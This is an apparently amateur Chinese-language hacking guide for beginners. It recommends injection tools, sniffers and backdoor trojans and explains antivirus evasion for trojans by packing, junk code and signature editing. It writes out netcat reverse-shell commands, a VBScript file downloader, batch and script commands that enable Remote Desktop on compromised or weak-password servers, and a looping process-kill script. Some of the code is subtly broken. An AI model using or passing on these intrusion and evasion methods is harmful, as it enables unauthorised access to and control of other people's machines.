黑客技术学习小结

黑客技术学习小结                              
                ------美丽の破船

      仔细想想，我学习“网络安全”已经很长时间了！的确收获不小！虽然以前，高中的学习生活压的喘不过气来，但挤出点时间学习“网安”，真是不矣乐乎！
    “共享”是我们的基本精神，可是想想我“共享”出来的东西真是少之又少，因此，写出此破烂文章，希望对还没有入门的“菜菜”有所帮助！少走些弯路！
      说到“黑客”、“入侵”很大的一部分就是程序的安全性，无疑这一点要求我们应该多少懂得一点编程知识！
      下面我介绍一下我网安的大体知识、以帮助那些不知道该从何处下手的朋友：
 
一、使用工具：
      只会用工具的黑客，不是一个好的黑客；但是，一个好的黑客一定会把工具用的出神入化！（比如：魔女の条件：她把一个很普通的RADMIN配置的不得不让人叫绝！！）是的，好的工具配合好的方法及灵活的运用，可以很好的为自己提高声势和信心！下面我介绍一些比较经典的工具，仅供参考：
    1、扫描工具：
       （1）SurperScan 特点：扫描的范围广，内容很详细，准确性也可以！尤其是到了3.0以后，更是增加了许多的特色!
       （2）X-SCan：这个可能是一个黑客必备的工具之一了！尤其是它那详尽的报告及漏洞修补建议！无一不体现出它功能的强大！
       还有X-Way，nmap等等这些都比较常用！大家可以都试一下！

    2、脚本少表攻击程序：

       （1）NBSI：这个不用我说了吧！本人推荐（911专用版）感觉真的挺好! 当然最新的版本已经开始支持对JSP的注入了！
       （2）Domain：现在出来3.6版了！呵呵，在用法上没有太多的变化！只是对数据库文件作了些补充！大家可以自己用ACCESS打开它，来补充！
       （3）HDSI：这个是教主的工具！它以前的版本不是很好，本人推荐用“安静拓宽版！”这个不错！
       （4）CASI：这个是针对PHP环境的注入工具！功能我就不废话了！本人推荐校盟专用版，要是大家有钱！可以去买正式版。。。
        至于CGI环境：我就不多说了！毕竟它的发展前景不是很乐观！

    3、密码及嗅探工具：
           这样的工具比较多！但大家最好还是懂点协议的基础知识！但是好用的就是那么几个：X-Sniffer，SnifferNT，WinSockExpert等，这些工具的用途都很广！如：提COOKIE，分析数据的传输过程，提取用户名，密   

码等等，还有一些比较好用的如：CAIN，密码嗅探专家等
        密码相关的工具也就是破MD5的穷举程序，破解网页密码的如：朔雪等还有破ACCESS的破PUBWIN的破还原精灵还原卡的，至于盗号的木马。。。
        由于本人比较鄙视这个故，不谈这些！

    4、溢出工具
        这可能是黑客工具中最为霸道的程序了！只要根据不同的环境选择相应的工具，就可以了！这里我仅介绍与溢出相关的辅助工具的用法！至于具体的程序，大家可以自己去GOOGLE一下1
       （1）NC.EXE：堪称为瑞士军刀的简易后门程序！主要用于溢出有的网络连接！具体的格式如下；
       正向连接；nc.exe -vv ip port
       反向连接；nc.exe -vv -L -p PORT
       （2）TFTPD32.EXE这个我也不用说了吧！如果实在不动大家可以去GOOGLE以下《文件传输方法总结》一文！
       （3）MT.EXE；这个也是一个后门程序，游乐他可以完成很多是如；端口转向，克隆帐户、结束进程，替换服务等等1具体的使用方法大家还是去GOOGLE一下吧！

    5、木马后门程序及相关的一些工具；
       对于任何一个黑棵而言，这是必需的工具，许多的高手豆油自己的木马程序，而我们这些小菜只能用已经公布出来的随时可能被杀的木马程序了！

       这里只提三点建议：
        （1）不要使用当前正在流行的木马！
        （2）我讲一下木马免杀的基本方法！
             当前杀毒软件的查杀病毒的方法主要是病毒码核对，知道了这个我们就可以作相应的改动了！
        
          A：刚拿到一个木马程序我们首先用PEID对它进行查壳！若有壳则脱壳 

          ！大家可以到“看雪学院”去找脱壳机1
         B：脱完壳之后我们就要开始作免杀了！
      作免杀木马的大致方法如下：
          （a）加一个强壳！如北斗压缩、三层驱动SA等等
          （b）加花指令
             至于花指令的概念大家去GOOGLE一下，应该会有很大的收获的！
          （c）使用CCI定律：
             这个其实很简单！用PE EDITOR将木马程序的OEP入口地址加1便可！
          （d）手工定位和修改特征码！
            这个需要大家有一定的基础知识！等有时间我会专门的写一篇这方面的文章！当然如果上面的几种方法如果大家能够综合还运用也是很强的！
        (3)我推荐的木马程序：

            a:冬日之恋：这是一个CMD状态下采用C/S模式的木马后门程序！免杀也比较方便功能更是没的说！

            b；黑社会：这个其实就是RADMIN的扩展版（增加了反向连接功能）！按照魔女の条件提供的配置方法，木马是及少会被查杀的!而且功能、隐藏性都没的说！当然还有很多！比如：流萤，黑洞，PCSHARE等等

二、掌握一些常用的命令；
            WINDOWS出台以后，似乎DOS已经离我们很遥远了！但是，DOS的高效性使得我们至今没有能够完全摆脱掉它！比如论坛里还有很多用批处理来理系统垃圾的应用！而且入侵时很大一部分都要用到DOS命令，用到批处理 ！所以DOS命令大家都是要了解的！关于DOS的具体细节，我等以后作为具体的章节为大家讲解！

三、灵活的脚本攻击：
      这个概念比较大！也是当今流行了很长一段时间的攻击技术！因为脚本的范围比较广，大家可以直接利用别人已经写好的程序为我所用（如：Iget.vbs等）当然如果要想真正的用好脚本这一利器，还得自己学好脚本程序！（如：HTML、VBScript、JAVAScript、ASP、PHP等）不要被这么多的语言吓到！其实我们只要将一部分学好便可！大约两个月应该可以搞定!学好这一些对我们以后真正的理解脚本攻击，理解注入、理解跨站、理解COOKIE欺骗等都有很大的帮助！
下面我列出几个比较有用的脚本代码：（希望能对大家有所帮助）
      1、在CMD环境中下载文件的代码：

 1Set xPost = CreateObject("Microsoft.XMLHTTP") 
 2xPost.Open "GET",LCase(WScript.Arguments(0)),0 
 3xPost.Send() 
 4Set sGet = CreateObject("ADODB.Stream") 
 5sGet.Mode = 3 
 6sGet.Type = 1 
 7sGet.Open() 
 8sGet.Write(xPost.responseBody) 
 9sGet.SaveToFile LCase(WScript.Arguments(1)),2 
10

保存为iget.vbs便可！
使用方法：IGET.VBS    网址    保存的文件名  

      2、开3389的脚本：（共有两种方法）
方法1：

  echo [Components] > c:\sql 
  echo TSEnable = on >> c:\sql 
  sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q 

  编辑好后存为BAT文件，上传至肉鸡，执行。这里值得注意的是要确定winnt是否在c盘，如果在其他盘则需要改动。
方法2：

  (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
地址:www.netsill.com/rots.zip
使用方法：

在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如：

c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]

服务端口： 设置终端服务的服务端口。默认是3389。
自动重起选项： 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。（如果/r不行，可以试试这个）
使用此参数时，端口设置不能忽略。

 比如扫描到了一个有NT弱口令的服务器，IP地址是222.222.222.222，管理员帐

户是administrator，密码为空
运行CMD（2000下的DOS），我们给它开终端！
命令如下！
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令应该可以理解吧？cscript reg.vbe这是命令，后面的是IP，然后是管

理员帐户，接这是密码，因为222.222.222.222 这台服务器的管理员密码是空的

，那就用双引号表示为空，再后面是端口，你可以任意设置终端的端口，/fr是重

启命令（强制重启，一般我都用这个，你也可以/r，这是普通重启）

脚本会判断目标系统类型，如果不是server及以上版本，就会提示你是否要取消

。
因为pro版不能安装终端服务。
如果你确信脚本判断错误，就继续安装好了。

如果要对本地使用，IP地址为127.0.0.1或者一个点（用.表示），用户名和密码

都为空（用""表示）。

脚本访问的目标的135端口，如果目标135端口未开放，或者WMI服务关闭，那么脚

本就没用了。 

      3、列进程的脚本

1WScript.echo"PID   ProcessName"
2for each ps in getobject
3("winmgmts:\\.\root\cimv2:win32_Process").instances_ '这里有个空格
4Wscript.echo   ps.handle&vbtab&ps.name
5next

将它保存为LIST.VBE
运行时只要用：cscript list.vbe便可！

      4、杀进程的脚本！

 1  dim bag,pipe,honker,good
 2
 3     do
 4
 5     good="."
 6
 7     set bag=getobject("winmgmts:\\"&good&"\root\cimv2")
 8
 9     setpipe=bag.execquery("select * from sin32_process where name="进程名")
10
11   for each i in pipe
12
13      i.terminate()
14
15    next
16
17wscript.sleep 1
18
19loop
20

将它保存为kill.vbs便可用了!

其它方面,比如程序语言这种老生常谈的学习问题,我想大家每个人都有不同的方法!不用我来说了!

至于具体的入侵方法比如怎么跨站,怎么注入,怎么溢出,怎么用软件,我们等具体问题具体分析!我在这里就先偷个懒了!呵呵